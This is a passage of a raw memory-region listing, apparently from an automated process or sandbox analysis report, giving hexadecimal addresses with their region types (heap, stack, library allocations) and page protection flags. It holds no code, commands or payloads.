page read and write
1D09BB07000
trusted library allocation
page read and write
1D0B42A2000
heap
page read and write
1CC71EB6000
heap
page read and write
1DFC20AC000
heap
page read and write
1BDBD643000
heap
page read and write
2A5CB57B000
trusted library allocation
page read and write
C352E7E000
unkown
page readonly
2A5BB712000
trusted library allocation
page read and write
1DFC1E27000
heap
page read and write
1DFA9968000
trusted library allocation
page read and write
2A5B97A0000
heap
page read and write
1DFC1EE0000
heap
page read and write
20ED1B00000
heap
page read and write
7FFD9BB63000
trusted library allocation
page read and write
1D099F4E000
heap
page read and write
1D09BC2A000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1D09B564000
heap
page read and write
7FFD9B8F2000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1D09BC8B000
trusted library allocation
page read and write
1CC779E0000
trusted library allocation
page read and write
1CC773E0000
trusted library allocation
page read and write
1D0B4022000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
2A5B9702000
unkown
page readonly
1D09BA03000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
2A5BB58B000
trusted library allocation
page read and write
1CC71E7A000
heap
page read and write
1D0AC9F4000
trusted library allocation
page read and write
745E5FD000
stack
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
3C1E6FE000
stack
page read and write
2487F900000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7FFD9B99D000
trusted library allocation
page read and write
1DFA96BA000
trusted library allocation
page read and write
3C1E2FE000
stack
page read and write
1D0B4282000
heap
page read and write
2487F600000
unkown
page read and write
2A5BB4A6000
heap
page read and write
2A5B9BE0000
heap
page read and write
2A5BB6F8000
trusted library allocation
page read and write
1DFC2325000
heap
page read and write
1D0AC57F000
trusted library allocation
page read and write
20ED1A59000
heap
page read and write
1D0B4330000
heap
page read and write
1DFA7BB0000
trusted library allocation
page read and write
1D0B416E000
heap
page read and write
C353AFE000
stack
page read and write
1D099D45000
heap
page read and write
2A5BB6DA000
trusted library allocation
page read and write
1DFC21E5000
heap
page read and write
1D0ACD4C000
trusted library allocation
page read and write
1D0B36F0000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1D0B44C0000
heap
page read and write
7FFD9B9A6000
trusted library allocation
page read and write
7FFD9B9E8000
trusted library allocation
page read and write
1CC774F6000
heap
page read and write
1CC7275C000
heap
page read and write
1D09B994000
trusted library allocation
page read and write
1D09BC5A000
trusted library allocation
page read and write
1978FCF0000
heap
page read and write
1D09B8F3000
trusted library allocation
page read and write
1CC776B0000
trusted library allocation
page read and write
1D0B4058000
heap
page read and write
1D0B4276000
heap
page read and write
C352FFE000
stack
page read and write
D1D55FE000
stack
page read and write
1DFA96D4000
trusted library allocation
page read and write
745FDFB000
stack
page read and write
1D09BD88000
trusted library allocation
page read and write
1DFC2377000
heap
page read and write
7FFD9BA04000
trusted library allocation
page read and write
EA42EFB000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
C3535FE000
stack
page read and write
7FFD9BA16000
trusted library allocation
page read and write
1DFC1FAB000
heap
page read and write
1DFA9654000
trusted library allocation
page read and write
2A5B9700000
unkown
page readonly
2487F724000
heap
page read and write
1CC7766C000
trusted library allocation
page read and write
1CC77672000
trusted library allocation
page read and write
2A5B9950000
trusted library allocation
page read and write
1D0B41FA000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
1DFA979D000
trusted library allocation
page read and write
7FFD9BAE4000
trusted library allocation
page read and write
1D09BD1F000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B772000
trusted library allocation
page read and write
74621FD000
stack
page read and write
1D09BD58000
trusted library allocation
page read and write
1CC72DC0000
trusted library allocation
page read and write
B8C5E7E000
unkown
page readonly
1CC77524000
heap
page read and write
1D09BD64000
trusted library allocation
page read and write
1DFC2251000
heap
page read and write
1D0ACB12000
trusted library allocation
page read and write
C352377000
stack
page read and write
2A5B9940000
trusted library allocation
page read and write
1DFC211C000
heap
page read and write
1978FB90000
direct allocation
page execute read
7FFD9BAC0000
trusted library allocation
page read and write
923EBFE000
unkown
page readonly
2A5B9B80000
direct allocation
page execute and read and write
1D0B4488000
heap
page read and write
1DFA993E000
trusted library allocation
page read and write
1D0AC819000
trusted library allocation
page read and write
2487F62B000
heap
page read and write
1CC77700000
trusted library allocation
page read and write
7FFD9B906000
trusted library allocation
page execute and read and write
1D0ACBD0000
trusted library allocation
page read and write
1D099D30000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
2A5B98D0000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2A5BB521000
heap
page read and write
1978FBE0000
heap
page read and write
2487F689000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1D09BB1F000
trusted library allocation
page read and write
1D0ACE69000
trusted library allocation
page read and write
B8C5F7D000
stack
page read and write
44A37FE000
stack
page read and write
7FFD9B816000
trusted library allocation
page read and write
1CC774DB000
heap
page read and write
1D09BD9E000
trusted library allocation
page read and write
1CC72615000
heap
page read and write
1CC72702000
heap
page read and write
1CC71E40000
heap
page read and write
3C1DFFD000
stack
page read and write
1BDBDE02000
trusted library allocation
page read and write
44A2FFE000
stack
page read and write
1D0AB9BB000
trusted library allocation
page read and write
1CC71E00000
heap
page read and write
1D0ACA54000
trusted library allocation
page read and write
1DFA9668000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page execute and read and write
1DFA99B2000
trusted library allocation
page read and write
2A5D4695000
heap
page read and write
1DFC2357000
heap
page read and write
1D09BA73000
trusted library allocation
page read and write
1DFA7C10000
heap
page read and write
1DFA9620000
trusted library allocation
page read and write
1DFB9D12000
trusted library allocation
page read and write
1D09B89E000
trusted library allocation
page read and write
20ED1A40000
heap
page read and write
1CC773D0000
trusted library allocation
page read and write
1D09BD3F000
trusted library allocation
page read and write
1D09BC7B000
trusted library allocation
page read and write
1CC773E8000
trusted library allocation
page read and write
1CC77350000
trusted library allocation
page read and write
2A5CB559000
trusted library allocation
page read and write
2A5B98C5000
heap
page read and write
7FFD9BA22000
trusted library allocation
page read and write
1DFA9806000
trusted library allocation
page read and write
7FFD9B904000
trusted library allocation
page execute and read and write
1DFB9DD0000
trusted library allocation
page read and write
1CC71E5B000
heap
page read and write
C35267E000
unkown
page readonly
1CC77940000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
1D09BAE3000
trusted library allocation
page read and write
1DFC1E5F000
heap
page read and write
1D09B9E3000
trusted library allocation
page read and write
74615FD000
stack
page read and write
1CC774C7000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1CC77614000
trusted library allocation
page read and write
1D0B42F6000
heap
page read and write
1DFC2193000
heap
page read and write
1CC72FA0000
trusted library section
page readonly
7FFD9BA20000
trusted library allocation
page read and write
1CC77600000
trusted library allocation
page read and write
1D09BBEF000
trusted library allocation
page read and write
1D09BC25000
trusted library allocation
page read and write
1CC7275C000
heap
page read and write
1D0B42C1000
heap
page read and write
1D0B4535000
heap
page read and write
1D09BC4A000
trusted library allocation
page read and write
1978FBB5000
heap
page read and write
1D099F20000
heap
page execute and read and write
1D0AB970000
trusted library allocation
page read and write
1D09BCDE000
trusted library allocation
page read and write
1DFA981B000
trusted library allocation
page read and write
1D0B43D4000
heap
page read and write
1D0B4427000
heap
page read and write
7FF44CBC0000
trusted library allocation
page execute and read and write
1D0B437A000
heap
page read and write
1D09BBD2000
trusted library allocation
page read and write
C35337E000
unkown
page readonly
1DFA9A32000
trusted library allocation
page read and write
745DDFF000
stack
page read and write
1D0B4980000
trusted library allocation
page read and write
1DFC1E0C000
heap
page read and write
1D0B43AD000
heap
page read and write
20ED1950000
heap
page read and write
1D0B425F000
heap
page read and write
7FFD9BA65000
trusted library allocation
page read and write
1DFC2096000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
1BDBD590000
heap
page read and write
1CC7760E000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
1D0B435A000
heap
page read and write
1D09B954000
trusted library allocation
page read and write
2A5BB6A7000
trusted library allocation
page read and write
7FFD9B998000
trusted library allocation
page read and write
1D0B427D000
heap
page read and write
1DFC225E000
heap
page read and write
1DFA9911000
trusted library allocation
page read and write
140784000
remote allocation
page execute and read and write
1CC77770000
remote allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
C3532FE000
stack
page read and write
1978FC20000
heap
page read and write
1D0B428E000
heap
page read and write
20ED1A13000
heap
page read and write
1DFA97F9000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
1CC773E7000
trusted library allocation
page read and write
1D09BB03000
trusted library allocation
page read and write
D1D59FE000
stack
page read and write
1CC77462000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
1CC776A0000
trusted library allocation
page read and write
1D09BD94000
trusted library allocation
page read and write
1DFC2080000
heap
page read and write
1D0AB864000
trusted library allocation
page read and write
1DFA98F7000
trusted library allocation
page read and write
1978FBB0000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BA08000
trusted library allocation
page read and write
3C1E3FF000
stack
page read and write
2A5D3DE0000
heap
page execute and read and write
923E6FE000
stack
page read and write
1D0ACD6F000
trusted library allocation
page read and write
1DFA9789000
trusted library allocation
page read and write
1D099D10000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
C3534FE000
stack
page read and write
1D0B443E000
heap
page read and write
1D0AB922000
trusted library allocation
page read and write
1CC71EFE000
heap
page read and write
1D09B974000
trusted library allocation
page read and write
2A5BB524000
heap
page read and write
7FFD9B9C6000
trusted library allocation
page read and write
7FFD9BA68000
trusted library allocation
page read and write
1CC71E8E000
heap
page read and write
1CC774C1000
heap
page read and write
2A5B999B000
heap
page read and write
2487F913000
heap
page read and write
1D0B4314000
heap
page read and write
19791B00000
heap
page read and write
7FFD9B9C2000
trusted library allocation
page read and write
1D0B4A50000
heap
page read and write
1CC71F29000
heap
page read and write
1D09BC9F000
trusted library allocation
page read and write
1D0B438B000
heap
page read and write
1DFA9A70000
trusted library allocation
page read and write
1CC776A0000
trusted library allocation
page read and write
2A5BB6C9000
trusted library allocation
page read and write
7FFD9BA71000
trusted library allocation
page read and write
1D09BC92000
trusted library allocation
page read and write
1CC72602000
heap
page read and write
20ED1970000
heap
page read and write
1DFC1FF8000
heap
page read and write
1CC7270E000
heap
page read and write
1DFC1E85000
heap
page read and write
7FFD9BA73000
trusted library allocation
page read and write
1DFC21C3000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1D0B42FA000
heap
page read and write
2A5CB551000
trusted library allocation
page read and write
1D09B934000
trusted library allocation
page read and write
1CC7744D000
heap
page read and write
745E1FE000
stack
page read and write
44A1FFE000
stack
page read and write
7FFD9B784000
trusted library allocation
page read and write
7FFD9B8FD000
trusted library allocation
page execute and read and write
1DFA9AA0000
trusted library allocation
page read and write
7FFD9B93E000
trusted library allocation
page read and write
2487F902000
heap
page read and write
2A5D3580000
trusted library allocation
page read and write
C35297A000
stack
page read and write
7FFD9B762000
trusted library allocation
page read and write
1CC72FE0000
trusted library section
page readonly
1D0AC3E3000
trusted library allocation
page read and write
1D0ACC8E000
trusted library allocation
page read and write
1D09BC0A000
trusted library allocation
page read and write
2A5BB540000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B9F9000
trusted library allocation
page read and write
20ED1980000
heap
page read and write
44A23FE000
stack
page read and write
1D09BCEF000
trusted library allocation
page read and write
2487F902000
heap
page read and write
1D0ACF27000
trusted library allocation
page read and write
1DFA962D000
trusted library allocation
page read and write
2487F715000
trusted library allocation
page read and write
1D099C65000
heap
page read and write
7FFD9BA24000
trusted library allocation
page read and write
1DFC1FE1000
heap
page read and write
1D099BC0000
heap
page read and write
C35357E000
unkown
page readonly
1D0B4414000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1DFA7A30000
heap
page read and write
1CC77691000
trusted library allocation
page read and write
1DFC1FAF000
heap
page read and write
1D09BCD8000
trusted library allocation
page read and write
19791100000
heap
page read and write
7FFD9BB30000
trusted library allocation
page read and write
3C1E0FE000
stack
page read and write
1DFA994C000
trusted library allocation
page read and write
1DFA97B7000
trusted library allocation
page read and write
C352A7E000
unkown
page readonly
20ED1B02000
heap
page read and write
1CC773E9000
trusted library allocation
page read and write
1D09BCA5000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page read and write
7FFD9B917000
trusted library allocation
page read and write
1D0AC7BA000
trusted library allocation
page read and write
1DFC214A000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1D0B4462000
heap
page read and write
1D0ABAB9000
trusted library allocation
page read and write
1D09B8ED000
trusted library allocation
page read and write
1DFC1E77000
heap
page read and write
1CC773E2000
trusted library allocation
page read and write
1D0B4297000
heap
page read and write
7FFD9B7AB000
trusted library allocation
page execute and read and write
2A5BB9AE000
trusted library allocation
page read and write
1DFA99CC000
trusted library allocation
page read and write
1BDBD5B0000
heap
page read and write
923E36B000
stack
page read and write
1D09BC40000
trusted library allocation
page read and write
1CC7748E000
heap
page read and write
1D09BC45000
trusted library allocation
page read and write
1CC720F0000
heap
page read and write
C35247E000
unkown
page readonly
1BDBD632000
heap
page read and write
1DFC1CA0000
heap
page execute and read and write
2A5B9976000
heap
page read and write
1DFA7BD0000
trusted library allocation
page read and write
1978FB70000
heap
page read and write
2A5B999D000
heap
page read and write
1D0AC8D7000
trusted library allocation
page read and write
1D09B8C3000
trusted library allocation
page read and write
1DFC1DB0000
trusted library section
page read and write
2A5B99B4000
heap
page read and write
1DFC1FEE000
heap
page read and write
D1D4DF3000
stack
page read and write
7FFD9B984000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1DFA96AD000
trusted library allocation
page read and write
745F9FC000
stack
page read and write
1D09BC2F000
trusted library allocation
page read and write
1D0ABBD7000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
1CC77610000
trusted library allocation
page read and write
1D09B90D000
trusted library allocation
page read and write
1CC72FD0000
trusted library section
page readonly
1CC73331000
trusted library allocation
page read and write
2A5BB72A000
trusted library allocation
page read and write
19793900000
heap
page read and write
1DFC226B000
heap
page read and write
2A5B9960000
heap
page execute and read and write
C353FFE000
stack
page read and write
1CC77615000
trusted library allocation
page read and write
1D09B9FD000
trusted library allocation
page read and write
1CC773B0000
trusted library allocation
page read and write
1DFA98BC000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1CC77440000
heap
page read and write
1D0ACDAB000
trusted library allocation
page read and write
1D09BCC8000
trusted library allocation
page read and write
1D099F45000
heap
page read and write
1D0AC6FB000
trusted library allocation
page read and write
20ED1A00000
heap
page read and write
1CC72FC0000
trusted library section
page readonly
1D0B429B000
heap
page read and write
1CC72900000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1D0ACB71000
trusted library allocation
page read and write
2A5BB4F2000
heap
page read and write
1DFA7C15000
heap
page read and write
1D09BDD4000
trusted library allocation
page read and write
1CC776A0000
trusted library allocation
page read and write
7FFD9B752000
trusted library allocation
page read and write
1CC72580000
trusted library allocation
page read and write
1978E3B5000
heap
page read and write
1D0B403B000
heap
page read and write
C352F7E000
unkown
page readonly
1CC774ED000
heap
page read and write
1BDBD613000
heap
page read and write
923E7FE000
unkown
page readonly
1D0B43F0000
heap
page read and write
1DFA7A50000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1DFA7AE7000
heap
page read and write
7FFD9BBB9000
trusted library allocation
page read and write
1D0AC936000
trusted library allocation
page read and write
1DFA977C000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page execute and read and write
1D099D40000
heap
page read and write
EA42AAD000
stack
page read and write
1D09B923000
trusted library allocation
page read and write
1DFC2152000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
1CC71E73000
heap
page read and write
C35307E000
unkown
page readonly
1D0AC422000
trusted library allocation
page read and write
1DFA9B0B000
trusted library allocation
page read and write
1978E2D0000
heap
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
1DFA9AAD000
trusted library allocation
page read and write
1CC71DF0000
heap
page read and write
1CC7768E000
trusted library allocation
page read and write
74625F7000
stack
page read and write
1CC774C1000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
1DFA9AD5000
trusted library allocation
page read and write
2487F623000
unkown
page read and write
1DFA7A70000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
2A5BB430000
heap
page read and write
1DFC1EFE000
heap
page read and write
1CC776BA000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
1CC77461000
heap
page read and write
1CC77360000
trusted library allocation
page read and write
1CC72600000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
7FFD9BAD0000
trusted library allocation
page read and write
1CC77383000
trusted library allocation
page read and write
1D09BABE000
trusted library allocation
page read and write
1DFA9731000
trusted library allocation
page read and write
1D0B411B000
heap
page read and write
1D09BC5F000
trusted library allocation
page read and write
1CC7748E000
heap
page read and write
1D09BA44000
trusted library allocation
page read and write
1CC7271B000
heap
page read and write
1D0ABD54000
trusted library allocation
page read and write
1DFC230A000
heap
page read and write
1D0AC461000
trusted library allocation
page read and write
7FFD9BA7B000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
2487F900000
heap
page read and write
1CC773E1000
trusted library allocation
page read and write
1CC77515000
heap
page read and write
1DFC1EA1000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1DFA9647000
trusted library allocation
page read and write
1D09BE46000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
1DFA9AE9000
trusted library allocation
page read and write
1D09BBFF000
trusted library allocation
page read and write
2487F63B000
heap
page read and write
1D0ABC95000
trusted library allocation
page read and write
2487F913000
heap
page read and write
1DFA97BD000
trusted library allocation
page read and write
20ED19B0000
trusted library allocation
page read and write
1DFC1F8A000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1CC72010000
heap
page read and write
1BDBD5F0000
trusted library allocation
page read and write
1DFA9A5C000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
1D099EE3000
trusted library allocation
page read and write
1DFC2170000
heap
page read and write
1D09B9C4000
trusted library allocation
page read and write
1DFC22DA000
heap
page read and write
1DFA9A03000
trusted library allocation
page read and write
1CC774E0000
heap
page read and write
1DFA99FC000
trusted library allocation
page read and write
20ED2202000
trusted library allocation
page read and write
1DFA99D3000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
B8C607E000
unkown
page readonly
7FFD9BA40000
trusted library allocation
page execute and read and write
1CC72EB0000
trusted library allocation
page read and write
1CC776A3000
trusted library allocation
page read and write
C352EFE000
stack
page read and write
1CC71E78000
heap
page read and write
923E8FE000
stack
page read and write
7FFD9B78B000
trusted library allocation
page execute and read and write
1CC776E5000
trusted library allocation
page read and write
74601FE000
stack
page read and write
1D0B4005000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1D0ABB78000
trusted library allocation
page read and write
1D09BBC5000
trusted library allocation
page read and write
1CC7275C000
heap
page read and write
2A5B99FE000
heap
page read and write
1CC71E9F000
heap
page read and write
19792F00000
heap
page read and write
1CC7751D000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1DFA976F000
trusted library allocation
page read and write
20ED1A6E000
heap
page read and write
1D0B44A2000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1CC71E22000
heap
page read and write
1CC7766F000
trusted library allocation
page read and write
1DFC2361000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
7FFD9BA78000
trusted library allocation
page read and write
2487F490000
heap
page read and write
7FFD9BA8B000
trusted library allocation
page read and write
1D099BAB000
heap
page read and write
1CC77656000
trusted library allocation
page read and write
7FFD9B91D000
trusted library allocation
page read and write
1D0B45AF000
heap
page read and write
1DFA9844000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1D0B3FA0000
heap
page read and write
1CC71F02000
heap
page read and write
7FFD9B9C4000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
D1D51FE000
stack
page read and write
1DFC2158000
heap
page read and write
1CC77770000
remote allocation
page read and write
1CC7275C000
heap
page read and write
20ED1B35000
heap
page read and write
D1D65FF000
stack
page read and write
7FFD9BA76000
trusted library allocation
page read and write
1DFA7930000
heap
page read and write
1CC77520000
heap
page read and write
1DFA7B11000
heap
page read and write
1DFA9851000
trusted library allocation
page read and write
44A33FF000
stack
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1D0AC63D000
trusted library allocation
page read and write
1DFC1F99000
heap
page read and write
1D0B4121000
heap
page read and write
1D0B3FC6000
heap
page read and write
7FFD9B996000
trusted library allocation
page read and write
2A5B9A02000
heap
page read and write
3C1DCFC000
stack
page read and write
1D09BD68000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
1CC779D0000
trusted library allocation
page read and write
1D09BE26000
trusted library allocation
page read and write
2A5B9BE5000
heap
page read and write
B8C5D7E000
stack
page read and write
1DFB9511000
trusted library allocation
page read and write
1D09BD6E000
trusted library allocation
page read and write
1D0ACD4F000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1DFA7802000
unkown
page readonly
D1D71FD000
stack
page read and write
C35347E000
unkown
page readonly
1D099F4B000
heap
page read and write
1D09BD0F000
trusted library allocation
page read and write
1D0ABC36000
trusted library allocation
page read and write
1CC77600000
trusted library allocation
page read and write
1D0B4515000
heap
page read and write
2A5B9880000
heap
page read and write
1CC77720000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1BDBD602000
heap
page read and write
1D0B404F000
heap
page read and write
1D0B452B000
heap
page read and write
1D099B86000
heap
page read and write
D1D61FE000
stack
page read and write
C35287E000
unkown
page readonly
1D0B4108000
heap
page read and write
7FFD9B902000
trusted library allocation
page read and write
1D09BBE5000
trusted library allocation
page read and write
7FFD9B77A000
trusted library allocation
page read and write
1CC77664000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1DFA9AE2000
trusted library allocation
page read and write
1CC7750C000
heap
page read and write
1D09BD2F000
trusted library allocation
page read and write
2487F613000
unkown
page read and write
2A5B98C0000
heap
page read and write
1CC77454000
heap
page read and write
1DFC2126000
heap
page read and write
745D5E2000
stack
page read and write
1DFC20C7000
heap
page read and write
1DFA9A1E000
trusted library allocation
page read and write
1DFC1F10000
trusted library section
page read and write
1978FC31000
heap
page read and write
1D09BC0F000
trusted library allocation
page read and write
2A5B99E8000
heap
page read and write
1DFC2366000
heap
page read and write
1CC773D0000
trusted library allocation
page read and write
1978E3BD000
heap
page read and write
2A5BB726000
trusted library allocation
page read and write
1D09B8D3000
trusted library allocation
page read and write
D1D75FE000
stack
page read and write
7FFD9B9B8000
trusted library allocation
page read and write
1D099AA0000
heap
page read and write
C35367E000
unkown
page readonly
2487F700000
trusted library allocation
page read and write
1D09BBBF000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
7FFD9B830000
trusted library allocation
page read and write
1DFA7AA0000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1D0ABCF5000
trusted library allocation
page read and write
1DFC1E04000
heap
page read and write
1D09B690000
heap
page execute and read and write
2A5B99FC000
heap
page read and write
1CC7742C000
heap
page read and write
C352B7B000
stack
page read and write
7FFD9B764000
trusted library allocation
page read and write
2A5B98A0000
heap
page read and write
1978FC29000
heap
page read and write
20ED1A65000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
1DFC1F9D000
heap
page read and write
1978E1B0000
heap
page read and write
1CC774BF000
heap
page read and write
1CC71F13000
heap
page read and write
1D09B8B9000
trusted library allocation
page read and write
7FFD9B9DD000
trusted library allocation
page read and write
1D0AB96C000
trusted library allocation
page read and write
1DFC230F000
heap
page read and write
923E9FE000
unkown
page readonly
1D0AC75B000
trusted library allocation
page read and write
1D0AC520000
trusted library allocation
page read and write
1D0ACDAE000
trusted library allocation
page read and write
1D099CC0000
heap
page read and write
1D09BC70000
trusted library allocation
page read and write
1D0AC383000
trusted library allocation
page read and write
1D0AB6C1000
trusted library allocation
page read and write
1D0B432A000
heap
page read and write
1CC774BF000
heap
page read and write
7FFD9BB9B000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1D0ACCED000
trusted library allocation
page read and write
1CC72C40000
trusted library allocation
page read and write
1DFA975B000
trusted library allocation
page read and write
1D09B9A4000
trusted library allocation
page read and write
1CC776C2000
trusted library allocation
page read and write
1CC773C0000
trusted library allocation
page read and write
1CC7745A000
heap
page read and write
1D09BBCA000
trusted library allocation
page read and write
1D09BE42000
trusted library allocation
page read and write
1CC77618000
trusted library allocation
page read and write
1D0ACE0A000
trusted library allocation
page read and write
1D09BD04000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
1D09B8BD000
trusted library allocation
page read and write
2A5BB551000
trusted library allocation
page read and write
1CC71E95000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
1D0AB9FB000
trusted library allocation
page read and write
1DFA97E5000
trusted library allocation
page read and write
1D0B456F000
heap
page read and write
1DFA7800000
unkown
page readonly
1D0AB8C3000
trusted library allocation
page read and write
1D0ABDB3000
trusted library allocation
page read and write
1DFA9A7E000
trusted library allocation
page read and write
1DFA7C1E000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
1CC71E2B000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1DFA97C3000
trusted library allocation
page read and write
1DFA7A75000
heap
page read and write
1D0AC4C0000
trusted library allocation
page read and write
1DFA9904000
trusted library allocation
page read and write
1DFA9AA7000
trusted library allocation
page read and write
1CC774FD000
heap
page read and write
1D09B913000
trusted library allocation
page read and write
1DFA980C000
trusted library allocation
page read and write
1CC776F4000
trusted library allocation
page read and write
1D0B3FAA000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
1DFA93CD000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1D0ACAB3000
trusted library allocation
page read and write
1D09BC1F000
trusted library allocation
page read and write
1CC774F1000
heap
page read and write
1DFC1FC7000
heap
page read and write
19790700000
heap
page read and write
1DFC2280000
heap
page read and write
2A5BB4ED000
heap
page read and write
1CC7764D000
trusted library allocation
page read and write
1D09BC6B000
trusted library allocation
page read and write
1DFC2347000
heap
page read and write
2487F570000
trusted library allocation
page read and write
1DFA96DA000
trusted library allocation
page read and write
1D0AB97C000
trusted library allocation
page read and write
7FFD9BA7F000
trusted library allocation
page read and write
C352779000
stack
page read and write
1CC776E8000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2A5BB6A5000
trusted library allocation
page read and write
1D099BEA000
heap
page read and write
1D0B4015000
heap
page read and write
1DFC1FC1000
heap
page read and write
7FF4233A0000
trusted library allocation
page execute and read and write
1D0B40F0000
heap
page read and write
D1D6DF7000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9B964000
trusted library allocation
page read and write
1CC71E13000
heap
page read and write
1CC77400000
heap
page read and write
2A5BB498000
heap
page read and write
1CC7271B000
heap
page read and write
1CC71E7C000
heap
page read and write
1DFA9B3E000
trusted library allocation
page read and write
1CC776F1000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
3C1E1FE000
stack
page read and write
1CC7271B000
heap
page read and write
1D0ACF86000
trusted library allocation
page read and write
1D0ABB18000
trusted library allocation
page read and write
1D0AC995000
trusted library allocation
page read and write
1DFC2138000
heap
page read and write
2A5D4640000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1D0AC69C000
trusted library allocation
page read and write
C3533FE000
stack
page read and write
D1D81FB000
stack
page read and write
1DFA9997000
trusted library allocation
page read and write
745F1FE000
stack
page read and write
1D09BA4B000
trusted library allocation
page read and write
1D0ACDCE000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
2487F702000
trusted library allocation
page read and write
D1D69FE000
stack
page read and write
44A2BFC000
stack
page read and write
1D0B4210000
heap
page read and write
1D09BC50000
trusted library allocation
page read and write
1DFC1E3C000
heap
page read and write
2A5B9BC0000
trusted library allocation
page read and write
1D0B424D000
heap
page read and write
1DFC227E000
heap
page read and write
1DFA9A11000
trusted library allocation
page read and write
1D0B4081000
heap
page read and write
1D0B41F0000
heap
page read and write
2487F602000
unkown
page read and write
1DFC1540000
trusted library allocation
page read and write
1CC78000000
heap
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
1DFC2117000
heap
page read and write
1D0B402C000
heap
page read and write
1D0B439F000
heap
page read and write
7FFD9B934000
trusted library allocation
page read and write
2A5BB4B3000
heap
page read and write
1DFA9AC7000
trusted library allocation
page read and write
7FFD9B9D7000
trusted library allocation
page read and write
2A5B9A7E000
heap
page read and write
1D0AB805000
trusted library allocation
page read and write
1DFC1FB8000
heap
page read and write
1CC7752F000
heap
page read and write
1D099EE0000
trusted library allocation
page read and write
1DFC1F80000
heap
page read and write
1DFC2206000
heap
page read and write
1D0B4134000
heap
page read and write
7FFD9B7A4000
trusted library allocation
page read and write
1D0B43CA000
heap
page read and write
7FFD9BAB2000
trusted library allocation
page read and write
1D099BF3000
heap
page read and write
1DFC20BC000
heap
page read and write
1DFA7ACB000
heap
page read and write
1BDBD62B000
heap
page read and write
1D0B40FA000
heap
page read and write
1DFC1E20000
